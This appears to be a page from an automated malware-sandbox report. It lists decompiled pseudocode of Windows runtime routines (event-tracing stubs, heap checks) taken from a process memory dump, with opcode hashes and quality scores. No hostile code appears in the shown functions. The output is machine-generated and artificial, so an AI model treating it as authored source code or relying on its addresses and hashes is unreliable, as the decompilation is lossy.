                        • Instruction Fuzzy Hash: 5F0168725043419FC710EF29C944B2A77E6ABC0315F08CA19F88993790DEB0D540CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02C4FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x2c8d360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E02BDFA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x266;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 364eac16c874dea0216ea7bce1738aba169c61e4909dd11833910fa2b535609e
                        • Instruction ID: 3673ea7ad2e561c462b34395c62dee8a51a7c0c3882dc1dfef48bb8fb436579b
                        • Opcode Fuzzy Hash: 364eac16c874dea0216ea7bce1738aba169c61e4909dd11833910fa2b535609e
                        • Instruction Fuzzy Hash: 10018471E00618ABDB14DFA9D845FAFB7B8EF45710F04416AF901AB290EA719E01CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E02C4FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				short _v58;
                        				char _v64;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_t24 = __ebx;
                        				_v12 =  *0x2c8d360 ^ _t32;
                        				_t30 = __edx;
                        				_t31 = __ecx;
                        				E02BDFA60( &_v64, 0, 0x30);
                        				_v24 = _a4;
                        				_v32 = _t31;
                        				_v28 = _t30;
                        				_v58 = 0x267;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0388;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v64);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f45a98ff4a977aed9cad72ec4b4dd616cb60ce5260aa68b304863ba7102adc3
                        • Instruction ID: 3ab6ceb646ba4a7e1d22e5814354201573c13145b85146c4d741866a5e6332fc
                        • Opcode Fuzzy Hash: 2f45a98ff4a977aed9cad72ec4b4dd616cb60ce5260aa68b304863ba7102adc3
                        • Instruction Fuzzy Hash: A401D471E00658ABCB14DFA9D801FAFBBB8EF40700F00406AF904AB280EE709A00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02C68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				signed int _v12;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				short _v66;
                        				char _v72;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t18;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v12 =  *0x2c8d360 ^ _t32;
                        				_t31 = _a8;
                        				_t30 = _a12;
                        				_v66 = 0x1c20;
                        				_v40 = __ecx;
                        				_v36 = __edx;
                        				_v32 = _a4;
                        				_v28 = _a8;
                        				_v24 = _a12;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v72);
                        				_push(0x14);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                        			}

















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10164be40a341678663bc3e062669fe6aac9cd5f41f7c3100eb1c71d975b2f0d
                        • Instruction ID: 49c89938dda935afcddf65c75b68d25486c7c315deedcc016c83fc9208072e81
                        • Opcode Fuzzy Hash: 10164be40a341678663bc3e062669fe6aac9cd5f41f7c3100eb1c71d975b2f0d
                        • Instruction Fuzzy Hash: 90012171A4021D9FCB04DFA9D9459EEB7B8EF48710F10415AF905E7341EA34A900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02C68ED6(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				short _v62;
                        				char _v68;
                        				signed char* _t29;
                        				intOrPtr _t35;
                        				intOrPtr _t41;
                        				intOrPtr _t42;
                        				signed int _t43;
                        
                        				_t40 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t43;
                        				_v28 = __ecx;
                        				_v62 = 0x1c2a;
                        				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                        				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                        				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                        				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                        				_v24 = __edx;
                        				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                        				if(E02BB7D50() == 0) {
                        					_t29 = 0x7ffe0386;
                        				} else {
                        					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v68);
                        				_push(0x1c);
                        				_push(0x20402);
                        				_push( *_t29 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                        			}



















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 74852310423707bc1490e7ba6900bf012ecf4f9d0cc21c9b70d8c27645f6a74e
                        • Instruction ID: b887ad4058f8d8ee08f64840e9a3396cf5ad76fcd7b6667dd5f55aae98dd8fa1
                        • Opcode Fuzzy Hash: 74852310423707bc1490e7ba6900bf012ecf4f9d0cc21c9b70d8c27645f6a74e
                        • Instruction Fuzzy Hash: BF112171E006199FDB04DFA9D445BAEF7F4FF08300F0442AAE519EB382E6349940CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9DB60(signed int __ecx) {
                        				intOrPtr* _t9;
                        				void* _t12;
                        				void* _t13;
                        				intOrPtr _t14;
                        
                        				_t9 = __ecx;
                        				_t14 = 0;
                        				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                        					_t13 = 0xc000000d;
                        				} else {
                        					_t14 = E02B9DB40();
                        					if(_t14 == 0) {
                        						_t13 = 0xc0000017;
                        					} else {
                        						_t13 = E02B9E7B0(__ecx, _t12, _t14, 0xfff);
                        						if(_t13 < 0) {
                        							L02B9E8B0(__ecx, _t14, 0xfff);
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                        							_t14 = 0;
                        						} else {
                        							_t13 = 0;
                        							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                        						}
                        					}
                        				}
                        				 *_t9 = _t14;
                        				return _t13;
                        			}








                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: 0d7a2399cc370ff0e88ddc88fdc21d52ac7a6945196bde8724e445a3d0511d21
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: DAF068332415639BDB327B974890B67A6969FC1B64F1600B6F2059B644CE64880296D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                        				signed char* _t13;
                        				intOrPtr _t22;
                        				char _t23;
                        
                        				_t23 = __edx;
                        				_t22 = __ecx;
                        				if(E02BB7D50() != 0) {
                        					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                        				} else {
                        					_t13 = 0x7ffe0384;
                        				}
                        				if( *_t13 != 0) {
                        					_t13 =  *[fs:0x30];
                        					if((_t13[0x240] & 0x00000004) == 0) {
                        						goto L3;
                        					}
                        					if(E02BB7D50() == 0) {
                        						_t13 = 0x7ffe0385;
                        					} else {
                        						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                        					}
                        					if(( *_t13 & 0x00000020) == 0) {
                        						goto L3;
                        					}
                        					return E02C17016(0x14a4, _t22, _t23, _a4, _a8, 0);
                        				} else {
                        					L3:
                        					return _t13;
                        				}
                        			}







                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 4d906e353c5b58e095192f153991924ae92f0eae13d810f877dd38928de16334
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 3B01A4322006809BDB22975DD804F6ABBA9EF82758F0944F1FB648B6B1DB79C840E715
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02C2FE87(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_v8 =  *0x2c8d360 ^ _t35;
                        				_v16 = __ecx;
                        				_v54 = 0x1722;
                        				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                        				_v28 =  *((intOrPtr*)(__ecx + 4));
                        				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0382;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}

















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47a4437bb201454034ddce0e280aa502d28961319a2f2be810ca8f5d7fc7d138
                        • Instruction ID: 7350c967548544228d93190608c14303bdab05db627a4249ca14f35fd1506019
                        • Opcode Fuzzy Hash: 47a4437bb201454034ddce0e280aa502d28961319a2f2be810ca8f5d7fc7d138
                        • Instruction Fuzzy Hash: 8E016275A0025CAFCB14DFA8D541AAEB7F4EF04304F104599F519DB382EA35DA01CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E02C5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t32;
                        				_v20 = _a4;
                        				_v12 = _a8;
                        				_v24 = __ecx;
                        				_v16 = __edx;
                        				_v50 = 0x1021;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0380;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}
















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f9846ef7610b5cbbe2a30adfd3c703202ef69fe036e98b9599ca55a46d1af97
                        • Instruction ID: 9fc8c61c224201ec11d4c72babe8ef66dd85ce4c91be990d1718715d91f447c6
                        • Opcode Fuzzy Hash: 3f9846ef7610b5cbbe2a30adfd3c703202ef69fe036e98b9599ca55a46d1af97
                        • Instruction Fuzzy Hash: 6A013C71A01618AFCB04EFA9D545AAEB7F4FF48700F0080A9FC09EB381EA74DA40CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 48%
                        			E02C68F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				short _v50;
                        				char _v56;
                        				signed char* _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				signed int _t32;
                        
                        				_t29 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t32;
                        				_v16 = __ecx;
                        				_v50 = 0x1c2c;
                        				_v24 = _a4;
                        				_v20 = _a8;
                        				_v12 = __edx;
                        				if(E02BB7D50() == 0) {
                        					_t18 = 0x7ffe0386;
                        				} else {
                        					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v56);
                        				_push(0x10);
                        				_push(0x402);
                        				_push( *_t18 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                        			}
















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15371da843ad342428b57cfae4686996569f96fe7028cbc8fcb32d8f08bc7c42
                        • Instruction ID: 5fd69d006cf3bcec1b1e1cfb7641ef4da3c028b00eee6e7d6495567463eb4eb6
                        • Opcode Fuzzy Hash: 15371da843ad342428b57cfae4686996569f96fe7028cbc8fcb32d8f08bc7c42
                        • Instruction Fuzzy Hash: 5A014F75A0020CAFCB04EFB8D545AAEB7F5EF48700F108599F905EB380EA74DA00DB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02C51608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t15;
                        				intOrPtr _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_t26 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t29;
                        				_v12 = _a4;
                        				_v20 = __ecx;
                        				_v16 = __edx;
                        				_v46 = 0x1024;
                        				if(E02BB7D50() == 0) {
                        					_t15 = 0x7ffe0380;
                        				} else {
                        					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				_push( &_v52);
                        				_push(0xc);
                        				_push(0x20402);
                        				_push( *_t15 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                        			}















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 853f7ad502410b21075c4a48ad4afdb361d2571066e9f6ad080265b9e35d68dc
                        • Instruction ID: 9c8fa97ca0cfa70a346a696cbdc77ec9547cd407ca49983e63d0e701f9487aa0
                        • Opcode Fuzzy Hash: 853f7ad502410b21075c4a48ad4afdb361d2571066e9f6ad080265b9e35d68dc
                        • Instruction Fuzzy Hash: 3DF04971A04658AFCB04EFA9D845AAEB7F4EF48300F0440A9E915EB281EA74DA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BBC577(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02BBC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2b711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L10:
                        						E02C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags == 0) {
                        						goto L10;
                        					}
                        					goto L9;
                        				} else {
                        					return 1;
                        				}
                        			}










                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e8c392a42ef758bf918a576832e25e77af642fc9108fd5b7ec7ae99f11e60470
                        • Instruction ID: 00b785f58da4e48d2729c57b8cfecf1971849c2a09f2ea292b2fac4875e27008
                        • Opcode Fuzzy Hash: e8c392a42ef758bf918a576832e25e77af642fc9108fd5b7ec7ae99f11e60470
                        • Instruction Fuzzy Hash: 26F09AB29256909FD733CB288046BB67FE8DF05674F4484E7D51A87643C7E4D880C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02BD927A(void* __ecx) {
                        				signed int _t11;
                        				void* _t14;
                        
                        				_t11 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                        				if(_t11 != 0) {
                        					E02BDFA60(_t11, 0, 0x98);
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                        					E02BD92C6(_t11, _t14);
                        				}
                        				return _t11;
                        			}






                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction ID: 597c89325361e623f0e8409cab0e22b902b803c9b714fc67464efbcd0afd0773
                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction Fuzzy Hash: 75E09B323409406BD7119E55DC84F97776EEF82725F0440B9F5055E252D6F5DD098BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02C52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				signed char _t3;
                        				signed char _t7;
                        				void* _t19;
                        
                        				_t17 = __ecx;
                        				_t3 = E02C4FD22(__ecx);
                        				_t19 =  *0x2c8849c - _t3; // 0x0
                        				if(_t19 == 0) {
                        					__eflags = _t17 -  *0x2c88748; // 0x0
                        					if(__eflags <= 0) {
                        						E02C51C06();
                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                        						__eflags = _t3;
                        						if(_t3 != 0) {
                        							L5:
                        							__eflags =  *0x2c88724 & 0x00000004;
                        							if(( *0x2c88724 & 0x00000004) == 0) {
                        								asm("int3");
                        								return _t3;
                        							}
                        						} else {
                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                        							__eflags = _t3 - 3;
                        							if(_t3 == 3) {
                        								goto L5;
                        							}
                        						}
                        					}
                        					return _t3;
                        				} else {
                        					_t7 =  *0x2c88724; // 0x0
                        					return E02C48DF1(__ebx, 0xc0000374, 0x2c85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                        				}
                        			}








                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E02C68D34(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				short _v42;
                        				char _v48;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				signed int _t26;
                        
                        				_t23 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t26;
                        				_v16 = __ecx;
                        				_v42 = 0x1c2b;
                        				_v12 = __edx;
                        				if(E02BB7D50() == 0) {
                        					_t12 = 0x7ffe0386;
                        				} else {
                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v48);
                        				_push(8);
                        				_push(0x20402);
                        				_push( *_t12 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                        			}














                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E02C68B58(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x2c8d360 ^ _t25;
                        				_v20 = __ecx;
                        				_v46 = 0x1c26;
                        				if(E02BB7D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v52);
                        				_push(4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B94F2E(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0) {
                        					L6:
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L8:
                        						E02C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags != 0) {
                        						goto L9;
                        					}
                        					goto L8;
                        				}
                        				_t18 = __ecx + 0x30;
                        				if(E02BBC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2b71030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L6;
                        				} else {
                        					return 1;
                        				}
                        			}










                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E02C68CD6(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				short _v38;
                        				char _v44;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x2c8d360 ^ _t25;
                        				_v12 = __ecx;
                        				_v38 = 0x1c2d;
                        				if(E02BB7D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v44);
                        				_push(0xffffffe4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
